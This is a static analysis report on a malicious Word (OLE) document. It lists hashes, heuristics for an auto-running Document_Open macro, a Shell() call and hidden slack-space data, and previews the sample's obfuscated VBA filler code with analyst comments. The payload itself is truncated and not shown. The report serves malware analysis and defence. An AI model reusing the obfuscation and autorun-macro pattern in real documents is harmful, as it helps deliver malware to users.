Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f0a6af8284dc9cd1…

MALICIOUS

Office (OLE)

123.7 KB First seen: 2019-04-17
MD5: ecd2ea2b35fa347c635b8f1c6ca9dbad SHA-1: 09f9b0c9c3fda055f4275c3f500b1f470061c6ae SHA-256: f0a6af8284dc9cd152c4d083d0bb7775aaea4c814d8a5d9818cfdd8509ba1ad5
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1203 Exploitation for Client Execution

The sample is an OLE document with a high-risk heuristic firing for a Shell() call within its VBA macros. The presence of a Document_Open macro indicates that the malicious code is designed to execute automatically when the document is opened. The VBA code is heavily obfuscated — the extracted module appears to be padded with dead arithmetic over undeclared names — but the Shell() call, rated critical, indicates an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The second high-severity finding, OLE_SLACK_ANOMALY (58% of the file in unallocated sector slack), should be reconciled with the macro-based execution path rather than treated as incidental.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 126,653 bytes but its declared streams total only 52,715 bytes — 73,938 bytes (58%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard OOXML DrawingML namespace identifier, expected boilerplate in Office documents rather than a download or C2 indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28814 bytes
SHA-256: f2bfad55e32dd44d65ec4638b604488e8fbdb65cfabf0f63d42f47c1cd87bc12
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "oCorzdV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' --- Analyst note (review) ---
' Obfuscation filler, not the payload. Five structurally identical If/ElseIf
' blocks perform arithmetic on names (zKFjJm, HOQzu, kkjzV, ...) that are never
' declared or assigned anywhere in this function. No Dim or Option Explicit is
' visible in the extract, so these are presumably implicit Variants (Empty) —
' TODO confirm against the full module. The function name is never assigned,
' so the call returns Empty; results are only written back into those same
' undeclared names. The Shell() call flagged by OLE_VBA_SHELL is NOT in this
' function; presumably it sits later in the truncated listing.
Private Function uDlRlVhivZIL()
' Any runtime error raised below (e.g. division by zero on an Empty/zero
' operand) is silently skipped and execution continues with the next line.
On Error Resume Next
   ' Block 1 of 5 — same shape as the others; only names and constants differ.
   ' Which branch runs depends on the (undefined) values being compared.
   If zKFjJm >= HOQzu Then
      qBiKo = 183388958 + 155564576   ' = 338953534, repeated verbatim in every block
      ElseIf qaRpn < LvwQY Then
      ' 3,784 iterations of pure arithmetic whose result (OMPLI) is never read here —
      ' padding/delay, not logic.
      For bBUCl = 96 To 3879
         OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX)
      Next
      bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz)
   End If
   ' Block 2 of 5.
   If bdiwEO >= wjGuoT Then
      jOmTzT = 183388958 + 155564576
      ElseIf onUfmz < pNRfCr Then
      For frOAR = 96 To 3879
         wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU)
      Next
      wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH)
   End If
   ' Block 3 of 5.
   If dllWNG >= TBpdc Then
      YriaD = 183388958 + 155564576
      ElseIf NjjtsF < YwoLFt Then
      For YhkJH = 96 To 3879
         saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC)
      Next
      nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz)
   End If
   ' Block 4 of 5.
   If lMwjN >= JXWlY Then
      KMVmm = 183388958 + 155564576
      ElseIf EXWvzi < MfCEE Then
      For tCwMcz = 96 To 3879
         PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop)
      Next
      VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB)
   End If
   ' Block 5 of 5.
   If Rjjfst >= cnXuZJ Then
      DPDfZ = 183388958 + 155564576
      ElseIf WFztn < PTzUU Then
      For FYiiw = 96 To 3879
         WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw)
      Next
      iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj)
   End If
End Function
' --- Analyst note (review) ---
' Second filler function, a template clone of the one above with only the
' names and numeric constants swapped: five identical If/ElseIf blocks, every
' referenced name undeclared and unassigned within this function, no return
' value assigned (call yields Empty). Nothing here reaches Shell(), file I/O,
' or the network; presumably the real entry point appears further down the
' truncated listing — confirm against the full module.
Private Function NKIlIUbQzwV()
' Any runtime error raised below (e.g. division by zero on an Empty/zero
' operand) is silently skipped and execution continues with the next line.
On Error Resume Next
   ' Block 1 of 5 — outcome depends on the (undefined) values being compared.
   If HsSLR >= Gbimp Then
      QJSTqd = 183388958 + 155564576   ' = 338953534, same constant pair as the sibling function
      ElseIf VBfGw < zVujS Then
      ' 3,784 iterations; iwEsr is written but never read in this function.
      For dOFRE = 96 To 3879
         iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH)
      Next
      zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH)
   End If
   ' Block 2 of 5.
   If uwvmz >= WlmHf Then
      lGULbn = 183388958 + 155564576
      ElseIf DIjpZ < oWHMfY Then
      For cOpwDF = 96 To 3879
         oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW)
      Next
      RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA)
   End If
   ' Block 3 of 5.
   If iwuAiH >= NiQlma Then
      tkOTdl = 183388958 + 155564576
      ElseIf cEJpQ < swdFpU Then
      For VHpZD = 96 To 3879
         npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT)
      Next
      jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY)
   End If
   ' Block 4 of 5.
   If pCarz >= SUCoai Then
      dKwvG = 183388958 + 155564576
      ElseIf SRLIi < piXBw Then
      For OqRcMt = 96 To 3879
         lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj)
      Next
      urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo)
   End If
   ' Block 5 of 5.
   If mcLcM >= GIMdfX Then
      JqqpMm = 183388958 + 155564576
      ElseIf jVRnr < DkRKj Then
      For FHUsCz = 96 To 3879
         RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf)
      Next
      OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL)
   End If
End Function
Private Function ZNBZsodYhlDmfZ()
On Error Resume Next
   If wtJqK >= ZjHSpE Then
      boHjv = 183388958 + 155564576
      ElseIf icWOsw < PHFSZb Then
      For cIvzt = 96 To 3879
         Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw)
      Next
      nLatZu = hajQu / QjBckT + 1126
... (truncated)